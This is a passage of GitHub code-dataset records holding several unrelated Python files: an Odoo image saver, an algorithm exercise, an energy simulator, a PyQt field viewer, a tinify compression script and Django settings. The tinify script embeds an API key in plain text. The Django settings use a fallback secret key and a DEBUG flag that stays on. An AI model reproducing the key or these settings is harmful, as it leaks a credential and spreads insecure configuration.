open( image_full_path , 'wb')\n # f.write(base64.b64decode(self.image))\n # f.close()\n # # print(\"file name\", image_full_path)\n # os.rename(image_full_path, image_full_path+'.png')\n #\n @api.model\n 
def create(self, vals):\n res = super(Image, self).create(vals)\n if res.image:\n # name, extension = self.get_file_extension(self.name)\n # self.name = name + '(' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') + ')' + extension\n try:\n\n os.mkdir(folder_path + str(res.partner_id.x_code))\n except FileExistsError:\n pass\n except Exception as e:\n pass\n image_full_path = join( folder_path, str(res.partner_id.x_code), str(str(datetime.now().date()) + '_' + str(time.time())) )\n f = open( image_full_path , 'wb')\n f.write(base64.b64decode(res.image))\n f.close()\n # print(\"file name\", image_full_path)\n os.rename(image_full_path, image_full_path+'.png')\n return res\n # @api.multi\n # def create(self):\n # super(Image,self).create()\n #\n\n\n def get_file_extension(self, path):\n filename, file_extension = os.path.splitext(path)\n return filename, file_extension\n\n","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/res_partner_custom/models/image_profile_customer.py","file_name":"image_profile_customer.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9466213039","text":"# 1209. Sum\n# Level D3\n# Site: https://swexpertacademy.com/main/code/problem/problemList.do\n\nfor _ in range(10):\n tc = int(input())\n brd = [list(map(int, input().split())) for _ in range(100)]\n brd2 = []\n for x in range(100):\n line = []\n for y in range(100):\n line.append(brd[y][x])\n brd2.append(line)\n\n answer = 0\n for i in range(100):\n maxV = max(sum(brd[i]), sum(brd2[i]))\n if maxV > answer:\n answer = maxV\n\n cross1, cross2 = 0, 0\n for i in range(100):\n cross1 += brd[i][i]\n cross2 += brd2[i][i]\n\n answer = max(answer, cross2, cross1)\n\n print(f'#{tc} {answer}')\n","repo_name":"Panseung/algo_python_2023","sub_path":"SWEA_D3/230626/1209.py","file_name":"1209.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7796072737","text":"from graph_data import make_graph,show_graph\n'''\nSimulates the device using a file that denotes whether a device is on or off at any given time with\nwith intervals designated in a csv file that follows the format\n\n device,state,on/off\n \n ie\n \n tv,on,111111010101111110000011111\n'''\n#from test.test_wsgiref import IntegrationTests #This line is potentially extraneous\nimport csv\n\n\ndef write_to_ifile(file_name: str, integration_period:int, input_generators: list):\n '''writes the strings generated by the string generators onto the input csv'''\n with open(file_name, 'w') as outfile:\n to_write = 'sample_rate:{}\\n'.format(integration_period)\n for input_generator in input_generators:\n to_write += input_generator.generate_str()\n outfile.write(to_write)\n \ndef write_to_peramfile(file_name: str, integration_period: int, device_map: dict):\n '''writes the strings generated by the string generators onto the input csv'''\n with open(file_name, 'w') as outfile:\n to_write = 'sample_rate:{}\\n'.format(integration_period)\n to_write += str(device_map)\n outfile.write(to_write)\n \ndef make_integral_array(power_array: list, integration_period: int):\n to_return = [0]\n for i in range(len(power_array)-1):\n to_return.append(energy_used(power_array[i:i+2], integration_period) + to_return[-1])\n return to_return\n\ndef write_to_csv(file_name, power_array: list, integral_array: list, integration_time):\n time_array = list(range(0, 
len(power_array)*integration_time, integration_time))\n with open(file_name, 'w+', newline='') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csv_file.write('time,')\n csv_writer.writerow(time_array)\n csv_file.write('power,')\n csv_writer.writerow(power_array)\n csv_file.write('energy,')\n csv_writer.writerow(integral_array)\n \n csv_file.close()\n \ndef analyze_data(file_name: str, integration_period: int, device_map: dict):\n power_map = parse_inputfile(file_name, device_map)\n power_matrix = list(power_map.values()) \n power_array = flatten_cols(power_matrix)\n integral_array = make_integral_array(power_array, integration_period)\n \n print('\\nEnergy Used: ', integral_array[-1], 'Watt-hours')\n make_graph(power_array, integration_period,'', 'Power (W)', 'Power Consumed',sub=211)\n make_graph(integral_array, integration_period, 'Time (hr)', 'Energy (W*hr)', 'Energy Used',sub=212)\n write_to_csv('outputs/graph_file.csv', power_array, integral_array, integration_period)\n show_graph()\n \ndef analyze_data_nograph(file_name: str, integration_period: int, device_map: dict):\n power_map = parse_inputfile(file_name, device_map)\n power_matrix = list(power_map.values()) \n power_array = flatten_cols(power_matrix)\n integral_array = make_integral_array(power_array, integration_period)\n \n return (power_map, power_matrix, power_array, integral_array)\n \ndef energy_used(power_array, int_period: int):\n '''trapezoidal riemman sum estimate of the amount of power used'''\n return (sum(power_array[1:])/3600*int_period + sum(power_array[:len(power_array)-1])/3600*int_period)/2\n\ndef make_int_array(size, start_value=0):\n '''returns an int list of length size with values start_value, default being 0'''\n to_return = []\n for i in range(size):\n to_return.append(0)\n \n return to_return\n\ndef flatten_cols(matrix: [list])->list:\n '''flatten a matrix by m by n into a array of size m by adding columns together\n ie\n | a_00 a_10 ... a_m0 |\n | a_01 ............. |\n | ................. | = [a_00 + a_01 + .. + a_0n, a_10 + a_11 + ... + a_1n, a_m0 + a_m1 + ... + a_mn]\n | a_0n ........ 
a_mn |\n '''\n \n to_return = []\n size = len(matrix[0])\n \n for j in range(size):\n to_append = 0\n for i in range(len(matrix)):\n assert(len(matrix[i]) == size)\n to_append += matrix[i][j]\n to_return.append(to_append)\n \n return to_return\n\ndef read_from_peramfile(file_name: str): #not fully implemented yet\n with open(file_name, 'r') as infile:\n read_integration_period_temp = infile.readline().strip() #Read first line only for integration period\n read_integration_period = read_integration_period_temp[12:] #read only the number in the first line\n read_device_map = {}\n cache = infile.readlines()[0:] #dumb read-in of string in file - start after header\n # loop through lines\n for line in cache:\n # skip lines starting with \"--\".\n if not line.startswith(\"--\"):\n # replace random amount of spaces (\\s) with tab (\\t),\n # strip the trailing return (\\n), split into list using\n # \"\\t\" as the split pattern\n line = line.split()\n # use first item in list for the key, join remaining list items\n # with \", \" for the value.\n read_device_map[(line[0])] = \", \".join(line[1:]) #example parser cose, but this does not format correctly\n\n \n return read_integration_period, read_device_map\n\n \ndef parse_inputstring(device, state, device_map, i_string:str, to_write:list)->list:\n '''an input string is a string of 1s and 0s that represent whether or not the device,state is on at\n a given time interval\n '''\n assert(len(to_write) == len(i_string))\n for i in range(len(i_string)):\n inst_st = int(i_string[i])\n if inst_st == 1:\n assert(to_write[i] == 0) # assert that to_write is already empty\n to_write[i] += int(inst_st)* device_map[device][state]\n \n return to_write\n\ndef parse_inputfile(file, device_map)-> dict:\n '''parses the device input file which is a csv file with format\n device, state, on/off string\n \n on/off string denotes with a 1 or a 0 whether or not a device is on during that time\n '''\n to_return = {}\n \n with open(file, 'r') as i_file:\n for line in i_file:\n if line[:11] == 'sample_rate':\n pass #lol beautiful code right here ima keep this for kicks\n else:\n info = line.rstrip().split(',')\n device, state, i_string = info[0], info[1], info[2]\n \n if(not device in to_return):\n to_return[device] = make_int_array(len(i_string))\n \n parse_inputstring(device, state, device_map, i_string, to_return[device])\n \n return to_return\n\ndef mapval_to_matrix(map: dict)->list:\n\n # maybe do some error checking here?\n \n return list(map.values())\n \n \n \nif __name__ == '__main__':\n # rudimentary testing\n \n # test flatten_cols\n assert(flatten_cols([[1,3,4],\n [2,3,4],\n [5,6,7]]) == [8,12,15])\n \n # test parse_input_srting\n power_array = [0,0,0,0,0,0,0,0,0,0]\n dev_map = {'television': {'on':100, 'off':0, 'standby':25}, 'xbox': {'on':70, 'off':0, 'standby':20}}\n input_str_tv = '1110000111'\n input_str_stndby = '0001111000'\n \n parse_inputstring('television', 'on', dev_map, input_str_tv, power_array)\n parse_inputstring('television', 'standby', dev_map, input_str_stndby, power_array)\n assert(power_array == [100, 100, 100, 25, 25, 25, 25, 100, 100, 100])\n print(energy_used(power_array, 1800))\n print(make_integral_array(power_array, 1800))\n \n # test parse_inputfile\n \n #d = parse_inputfile('test_input.csv', dev_map)\n #print(d)\n \n 
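    # --- Editor's illustrative example (appended; not in the original) ---
    # `energy_used` above is a trapezoidal Riemann sum: each sampling
    # interval of `int_period` seconds contributes the mean of its two
    # endpoint powers, and the factor int_period/3600 converts
    # watt-seconds to watt-hours. A compact stdlib-only reference:
    def _trapz_wh(power_w, period_s):
        """Trapezoidal integral of a power series, in watt-hours."""
        step_h = period_s / 3600.0  # seconds -> hours per interval
        return sum((a + b) / 2.0 * step_h
                   for a, b in zip(power_w, power_w[1:]))
    # agrees with the module's own estimate on the test series above
    assert abs(_trapz_wh([100, 100, 25], 1800) -
               energy_used([100, 100, 25], 1800)) < 1e-9
    # ----------------------------------------------------------------------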
","repo_name":"CalPlug/PlugLoadSimulator","sub_path":"PLSIMPriorVersions/plugloadsimDefault/device_sim.py","file_name":"device_sim.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23072905541","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nfrom matplotlib.backends.backend_qt5agg import (FigureCanvasQTAgg, NavigationToolbar2QT)\nfrom matplotlib.figure import Figure\nfrom PyQt5 import QtCore, QtGui, QtWidgets \nfrom scipy import ndimage\n\nclass fieldViewer():\n def __init__(self, _parent, _widget):\n self.parent = _parent\n self.m_widget = _widget\n self.filepaths = None\n self.loaded = False\n\n self.m_widget.setMinimumSize(QtCore.QSize(350, 350))\n\n # a figure instance to plot on\n self.figure = Figure(figsize=(3,4))\n\n # this is the Canvas widget that displays the 'figure'\n self.canvas = FigureCanvasQTAgg(self.figure)\n # self.figure.set_cmap('viridis') # 'gray' # magma, seismic\n\n # this is the Navigation widget - toolbar for image\n self.toolbar = NavigationToolbar2QT(self.canvas, self.parent)\n\n # these are the app widgets connected to their slot methods\n titleFont=QtGui.QFont(\"Arial\",15)\n titleFont.setBold(True)\n self.titleLabel = QtWidgets.QLabel('Internal field')\n self.titleLabel.setFont(titleFont)\n self.titleLabel.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) \n self.slideBar = QtWidgets.QSlider(QtCore.Qt.Horizontal)\n self.slideBar.setMinimum(0)\n self.slideBar.setTickPosition(QtWidgets.QSlider.TicksBothSides)\n self.slideBar.setTickInterval(1) \n self.slideBar.setSingleStep(1)\n self.slideBar.setEnabled(False)\n self.slideBar.valueChanged[int].connect(self.changeValue)\n self.buttonPlus = QtWidgets.QPushButton('+')\n self.buttonPlus.setMaximumSize(QtCore.QSize(25, 30))\n self.buttonPlus.setEnabled(False)\n self.buttonPlus.clicked.connect(self.slideMoveUp)\n self.buttonMinus = QtWidgets.QPushButton('-')\n self.buttonMinus.setMaximumSize(QtCore.QSize(25, 30))\n self.buttonMinus.setEnabled(False) \n self.buttonMinus.clicked.connect(self.slideMoveDown) \n self.buttonSave = QtWidgets.QPushButton('Save')\n self.buttonSave.setMinimumSize(QtCore.QSize(50, 40))\n self.buttonSave.setEnabled(False)\n self.buttonSave.clicked.connect(self.saveData)\n self.vizBox = QtWidgets.QComboBox()\n self.vizBox.addItems(['field', 'gradients', 'distribution', 'meangrads'])\n self.vizBox.setEnabled(False) \n self.maskBox = QtWidgets.QComboBox()\n self.maskBox.addItems(['pore', 'grain', 'all'])\n self.maskBox.setEnabled(False)\n self.buttonViz = QtWidgets.QPushButton('View')\n self.buttonViz.setMinimumSize(QtCore.QSize(50, 40))\n self.buttonViz.setEnabled(False)\n self.buttonViz.clicked.connect(self.changeDataViz)\n self.labelDimensions = QtWidgets.QLabel('[h=0,w=0]')\n self.labelSliceId = QtWidgets.QLabel('Slice = 0')\n self.labelSliceId.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)\n\n # set the layouts\n mainLayout = QtWidgets.QVBoxLayout(self.m_widget)\n mainLayout.addWidget(self.titleLabel)\n mainLayout.addWidget(self.toolbar)\n layoutH2 = QtWidgets.QHBoxLayout()\n layoutH3 = QtWidgets.QHBoxLayout()\n layoutH4 = QtWidgets.QHBoxLayout() \n layoutH2.addWidget(self.buttonMinus) \n layoutH2.addWidget(self.slideBar) \n layoutH2.addWidget(self.buttonPlus) \n layoutH3.addWidget(self.labelDimensions)\n layoutH3.addItem(QtWidgets.QSpacerItem(15, 15, QtWidgets.QSizePolicy.MinimumExpanding))\n layoutH3.addWidget(self.buttonSave)\n 
layoutH3.addItem(QtWidgets.QSpacerItem(15, 15, QtWidgets.QSizePolicy.MinimumExpanding))\n layoutH3.addWidget(self.labelSliceId)\n layoutH4.addWidget(self.vizBox)\n layoutH4.addWidget(self.maskBox)\n layoutH4.addWidget(self.buttonViz)\n mainLayout.addWidget(self.canvas, QtWidgets.QSizePolicy.MinimumExpanding)\n mainLayout.addLayout(layoutH2)\n mainLayout.addLayout(layoutH3) \n mainLayout.addLayout(layoutH4) \n mainLayout.setAlignment(QtCore.Qt.AlignTop) \n\n # initialize the main image data\n self.m_map = None # numpy array\n self.m_mask = None # numpy array\n self.m_data = None # numpy array\n self.m_image = None # QImage object\n self.clim = None # numpy array\n self.cmap = None # matplotlib cmap object\n self.field_data = None # numpy array\n self.field_grads = None # numpy array\n self.field_lims = None # numpy array\n self.field_dist = None # list with numpy arrays of amps, bins\n self.grads_lims = None # numpy array\n self.mean_grads = None # numpy array\n self.pore_color = 0\n\n \n def clear(self):\n self.__del__()\n\n def __del__(self):\n # remove temporary data: \n self.m_data = None\n self.m_image = None\n\n # @Slot()\n def plotImage(self, _slice):\n self.m_mask = 1\n if(self.maskBox.currentText() == 'pore'):\n self.m_mask = np.where(self.m_map[_slice] == self.pore_color, True, False)\n elif(self.maskBox.currentText() == 'grain'):\n self.m_mask = np.where(self.m_map[_slice] == self.pore_color, False, True)\n \n self.figure.clear()\n ax = self.figure.add_subplot(111)\n img = ax.imshow(self.m_mask * self.m_data[_slice] + ~self.m_mask * self.m_data.min()) #, norm=matplotlib.colors.LogNorm()) \n ax.set_xticks([])\n ax.set_yticks([]) \n img.set_cmap(self.cmap)\n # img.set_cmap('seismic') \n \n cbar = self.figure.colorbar(img, fraction=0.05, pad=0.04)\n img.set_clim(self.clim)\n \n if(self.vizBox.currentText() == 'field'):\n ax.set_title('Magnetic field')\n cbar.set_label('G')\n elif(self.vizBox.currentText() == 'gradients'):\n ax.set_title('Field gradient')\n cbar.set_label('G/cm')\n\n ax.figure.tight_layout()\n ax.figure.canvas.draw()\n\n # self.buttonPlot.setEnabled(False) \n return\n\n def plotDist(self):\n self.figure.clear()\n ax = self.figure.add_subplot(111)\n heights = self.field_dist[0]\n widths = self.field_dist[1][1:] - self.field_dist[1][:-1]\n l_edges = self.field_dist[1][:-1]\n # img = ax.bar(l_edges, heights, widths, align='edge')\n img = ax.plot(l_edges + widths*0.5, heights)\n ax.set_xscale('log')\n ax.set_xlabel('Field Gradient (G/cm)')\n ax.set_ylabel('Volume fraction')\n ax.set_ylim([0.0, 1.1*heights.max()])\n ax.figure.tight_layout()\n ax.figure.canvas.draw()\n return\n\n def plotMeanGradsPerSlice(self):\n self.figure.clear()\n ax = self.figure.add_subplot(111)\n img = ax.plot(self.mean_grads)\n ax.set_ylabel('Mean Field Gradient (G/cm)')\n ax.set_xlabel('Slice')\n ax.figure.tight_layout()\n ax.figure.canvas.draw()\n return\n\n # @Slot()\n def changeValue(self, _value):\n current_slice = _value\n self.loadImageData(current_slice, True)\n self.labelSliceId.setText(\"Slice = \"+str(_value+1)) \n return\n\n # @Slot()\n def slideMoveUp(self):\n if(self.slideBar.value() + 1 < self.field_data.shape[0]):\n self.slideBar.setValue(self.slideBar.value()+1)\n return\n\n # @Slot()\n def slideMoveDown(self):\n if(self.slideBar.value() > 0):\n self.slideBar.setValue(self.slideBar.value()-1)\n return\n\n # @Slot()\n def loadFieldViz(self):\n self.loadImageData(0, True)\n self.buttonPlus.setEnabled(True) \n self.buttonMinus.setEnabled(True) \n 
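        # --- Editor's illustrative sketch (not part of the original) ---
        # plotImage() above composites the field with a pore/grain mask:
        #     masked = mask * data + ~mask * data.min()
        # so excluded pixels collapse to the colour-scale minimum, e.g.:
        #
        #     data = np.array([[1.0, 5.0], [3.0, 9.0]])
        #     mask = np.array([[True, False], [False, True]])
        #     mask * data + ~mask * data.min()  # -> [[1., 1.], [1., 9.]]
        #
        # ----------------------------------------------------------------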
self.slideBar.setMaximum(self.field_data.shape[0]-1)\n self.slideBar.setValue(0)\n self.slideBar.setEnabled(True)\n self.labelSliceId.setText(\"Slice = 1\")\n self.loaded = True\n return\n\n def loadDistViz(self):\n self.buttonPlus.setEnabled(False) \n self.buttonMinus.setEnabled(False) \n self.slideBar.setMaximum(self.field_data.shape[0]-1)\n self.slideBar.setValue(0)\n self.slideBar.setEnabled(False)\n self.labelSliceId.setText(\"\")\n self.plotDist()\n self.loaded = True\n return \n\n def loadMeanGradsViz(self):\n self.buttonPlus.setEnabled(False) \n self.buttonMinus.setEnabled(False) \n self.slideBar.setMaximum(self.field_data.shape[0]-1)\n self.slideBar.setValue(0)\n self.slideBar.setEnabled(False)\n self.labelSliceId.setText(\"\")\n self.plotMeanGradsPerSlice()\n self.loaded = True\n return \n\n\n # Method\n def loadImageData(self, _slice, _updateWindow):\n if _updateWindow:\n self.labelDimensions.setText(\"[h=\"+str(self.m_data[_slice].shape[0])+\",w=\"+str(self.m_data[_slice].shape[1])+\"]\")\n self.plotImage(_slice)\n return\n\n # Method\n def changeDataViz(self):\n if(self.vizBox.currentText() == 'distribution'):\n self.loadDistViz()\n elif(self.vizBox.currentText() == 'field'):\n self.m_data = self.field_data\n self.clim = self.field_lims\n self.cmap = 'seismic'\n self.loadFieldViz()\n elif(self.vizBox.currentText() == 'gradients'):\n self.m_data = self.field_grads\n self.clim = self.grads_lims\n self.cmap = 'Reds'\n self.loadFieldViz()\n elif(self.vizBox.currentText() == 'meangrads'):\n self.loadMeanGradsViz()\n return\n \n\n # Method\n def setFieldData(self, full_img, field, grads, pore_color):\n self.pore_color = pore_color\n self.m_map = full_img\n self.field_data = field\n self.field_grads = grads\n self.field_lims = np.array([field.min(), field.max()])\n self.grads_lims = np.array([0, grads.max()])\n \n self.m_data = self.field_data\n self.clim = self.field_lims\n self.cmap = 'seismic'\n self.curr_dviztype = 'field'\n\n self.vizBox.setEnabled(True)\n self.maskBox.setEnabled(True)\n self.buttonViz.setEnabled(True)\n self.buttonSave.setEnabled(True)\n self.loadFieldViz()\n\n self.getFieldDist()\n self.getMeanGradsPerSlice()\n return\n\n # Method\n def getFieldDist(self):\n # get true points\n data = self.field_grads[self.m_map == self.pore_color]\n data = data[data > 1.e-8]\n \n max_val = np.ceil(np.log10(data.max()*1.1))\n min_val = np.floor(np.log10(data.min()*0.9))\n bins = 64\n if(max_val - min_val > 0.0):\n bins *= int(max_val - min_val) \n hbins = np.logspace(min_val, max_val, bins)\n dist = np.histogram(data, hbins, density=False)\n \n self.field_dist = []\n self.field_dist.append(1.0 / dist[0].sum() * dist[0])\n self.field_dist.append(dist[1])\n return\n\n # Method\n def getMeanGradsPerSlice(self):\n slices = self.field_grads.shape[0]\n self.mean_grads = np.zeros(slices)\n\n for i in range(slices):\n data = self.field_grads[i]\n filtered = data[self.m_map[i] == self.pore_color]\n if(filtered.size > 0):\n self.mean_grads[i] = filtered.mean()\n else:\n self.mean_grads[i] = np.nan\n\n # print(self.mean_grads)\n\n return\n\n # @Slot()\n def saveData(self):\n if(self.vizBox.currentText() == 'distribution'):\n self.saveGradsDist()\n else:\n print('save field data to be implemented')\n return\n\n def saveGradsDist(self): \n d = {'bins':self.field_dist[1][1:], 'amps':self.field_dist[0], 'csum':self.field_dist[0].cumsum()}\n df = pd.DataFrame(data=d)\n \n db_dir = os.path.join(os.path.dirname(__file__), '..', 'db')\n options = QtWidgets.QFileDialog.Options()\n filename = 
QtWidgets.QFileDialog.getSaveFileName(self.parent, 'Save Field Data', db_dir, \"\", options=options)\n if(filename[0] != ''):\n\n # Save dist data in CSV format\n df.to_csv(filename[0] + '.csv')\n return\n\n # @Slot()\n def saveFieldData(self):\n db_dir = os.path.join(os.path.dirname(__file__), '..', 'db')\n options = QtWidgets.QFileDialog.Options()\n filename = QtWidgets.QFileDialog.getSaveFileName(self.parent, 'Save Field Data', db_dir, \"\", options=options)\n if(filename[0] != ''):\n os.mkdir(filename[0])\n my_file = filename[0].split(os.sep)[-1]\n\n field_dims = np.array([self.field_data.shape[2],self.m_data.shape[1],self.m_data.shape[0]],dtype='int32')\n\n # Save image data in BIN format\n dims_filename = my_file + '_dimensions.bin'\n with open(os.path.join(filename[0], dims_filename), \"bw\") as file_dims:\n field_dims.tofile(file_dims)\n\n # Save image data in BIN format\n bin_filename = my_file + '.bin'\n with open(os.path.join(filename[0], bin_filename), \"bw\") as file_bin:\n self.field_data.tofile(file_bin)\n\n # Save image data in TXT format\n txt_filename = my_file + '.txt' \n with open(os.path.join(filename[0], txt_filename), \"w\") as file_txt:\n field_dims.tofile(file_txt, sep=',')\n file_txt.write('\\n')\n self.field_data.tofile(file_txt, sep=',')\n\n return\n\n\n# This function was adapted from (https://github.com/Entscheider/SeamEater/blob/master/gui/QtTool.py)\n# Project: SeamEater; Author: Entscheider; File: QtTool.py; GNU General Public License v3.0 \n# Original function name: qimage2numpy(qimg)\n# We consider just 8 bits images and convert to single depth:\ndef convertQImageToNumpy(_qimg):\n h = _qimg.height()\n w = _qimg.width()\n ow = _qimg.bytesPerLine() * 8 // _qimg.depth()\n d = 0\n if _qimg.format() in (QtGui.QImage.Format_ARGB32_Premultiplied,\n QtGui.QImage.Format_ARGB32,\n QtGui.QImage.Format_RGB32):\n d = 4 # formats: 6, 5, 4.\n elif _qimg.format() in (QtGui.QImage.Format_Indexed8,\n QtGui.QImage.Format_Grayscale8):\n d = 1 # formats: 3, 24.\n else:\n raise ValueError(\".ERROR: Unsupported QImage format!\")\n buf = _qimg.bits().asstring(_qimg.byteCount())\n res = np.frombuffer(buf, 'uint8')\n res = res.reshape((h,ow,d)).copy()\n if w != ow:\n res = res[:,:w] \n if d >= 3:\n res = res[:,:,0].copy()\n else:\n res = res[:,:,0] \n return res\n\n","repo_name":"mcastrorib/dipolar_field","sub_path":"src/fieldViewer.py","file_name":"fieldViewer.py","file_ext":"py","file_size_in_byte":14716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26725000241","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = 'chenjunsheng'\n\nimport os\nimport os.path\nimport tinify\n\ntinify.key = \"zp8XWlmqgxODG4MLB8aO2XRO3L9BZZPO\"\n\ndef compress(path):\n\n for dir_path, dir_names, file_names in os.walk(path):\n file_names = filter(lambda file_name: file_name[-4:] == '.png', file_names)\n file_names = map(lambda file_name: os.path.join(dir_path, file_name), file_names)\n for file in file_names:\n print(file)\n source = tinify.from_file(file)\n source.to_file(file)\n\n file_names = filter(lambda file_name: file_name[-4:] == '.jpg', file_names)\n file_names = map(lambda file_name: os.path.join(dir_path, file_name), file_names)\n for file in file_names:\n print(file)\n source = tinify.from_file(file)\n source.to_file(file)\n\nif __name__ == '__main__':\n # try:\n # filenames = get_all_file_in(os.getcwd())\n # for filename in filenames:\n # print filename\n # except:\n # print \"execute list_file_dir fun error\"\n compress(os.getcwd())\n","repo_name":"ShenYuCN/WorkspacePython","sub_path":"tiny----py/tiny_original_location.py","file_name":"tiny_original_location.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4433056421","text":"import os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\n# SECRET_KEY = '5b2%^t56sqw3tt6*c+t%#2m@+o(^2$d6^-($+2@vp(ood_u6bg'\n\nSECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'Speccy-Rom')\n\n# SECURITY WARNING: don't run with debug turned on in production!\n# DEBUG = True\nDEBUG = bool( os.environ.get('DJANGO_DEBUG', True))\n\nALLOWED_HOSTS = ['127.0.0.1', 'testserver']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'ckeditor',\n 'ckeditor_uploader',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'dshop.apps.DshopConfig',\n 'mptt',\n 'cart',\n 'orders',\n 'accounts',\n 'crispy_forms'\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'dip.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')]\n ,\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'dip.context_processors.categories',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'dip.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Password validation\n# 
https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nAUTHENTICATION_BACKENDS = [\n 'accounts.auth_backends.UserEmailBackend',\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.0/topics/i18n/\n\nLANGUAGE_CODE = 'ru-ru'\n\nTIME_ZONE = 'Europe/Moscow'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'static'),\n os.path.join(BASE_DIR, 'static/img'),\n os.path.join(BASE_DIR, 'static/css'),\n os.path.join(BASE_DIR, 'static/js'),\n os.path.join(BASE_DIR, 'static/ico'),\n os.path.join(BASE_DIR, 'static/ckeditor'),\n\n\n]\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media/')\nCKEDITOR_UPLOAD_PATH = \"uploads/\"\n\nCKEDITOR_CONFIGS = {\n 'default': {\n 'toolbar': 'None'\n },\n}\n\nCART_SESSION_ID = 'cart'\n\nUSE_THOUSAND_SEPARATOR = True\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\nLOGIN_REDIRECT_URL = '/'\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n\n","repo_name":"Speccy-Rom/E-comerce-Django-website-","sub_path":"dip/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42020501736","text":"import os.path\nimport shutil\nfrom pathlib import Path\n\nfrom src.utils.path_utils import iterate_recursively\n\nbase_path = ''\nin_path = ['/home/malchul/work/GAN/StyleTransferDatasetPreparation/dumped/caricature_v2/good_samples']\nout_path = '/home/malchul/work/utilites/pinterest-downloader/Caricature_merged'\n\nall_files = [os.listdir(path) for path in in_path]\ndata_files = os.listdir()\n\nout_path = Path(out_path)\nout_path.mkdir(parents=True, exist_ok=True)\nfor i, img_path in enumerate(iterate_recursively(all_files)):\n base_name = os.path.basename(img_path)\n file_id = os.path.splitext(base_name)[0].split('_')[0]\n\n shutil.copyfile(img_path, out_path / f'{i}{os.path.splitext(img_path)[-1]}')","repo_name":"MalchuL/StyleTransferDatasetPreparation","sub_path":"utils/extract_no_detected_images.py","file_name":"extract_no_detected_images.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71708796267","text":"from utils.preprocessing.text.tweet_cleaner import TweetCleaner\nfrom utils.preprocessing.text.text_cleaner import TextCleaner\nimport pytest\n\n\n@pytest.fixture\ndef tweet_cleaner():\n tweet_cleaner = TweetCleaner()\n yield tweet_cleaner\n del tweet_cleaner\n\n\ndef test_tweet_cleaner_is_inherited_from_text_cleaner():\n cleaner = TweetCleaner()\n assert isinstance(cleaner, TweetCleaner)\n assert isinstance(cleaner, TextCleaner)\n\n\ndef test_tweet_cleaner_default_atttributes(tweet_cleaner):\n assert tweet_cleaner.remove_punctuations == True\n\n\ndef test_tweet_cleaner_inherited_attributes(tweet_cleaner):\n text_cleaner = TextCleaner()\n assert 
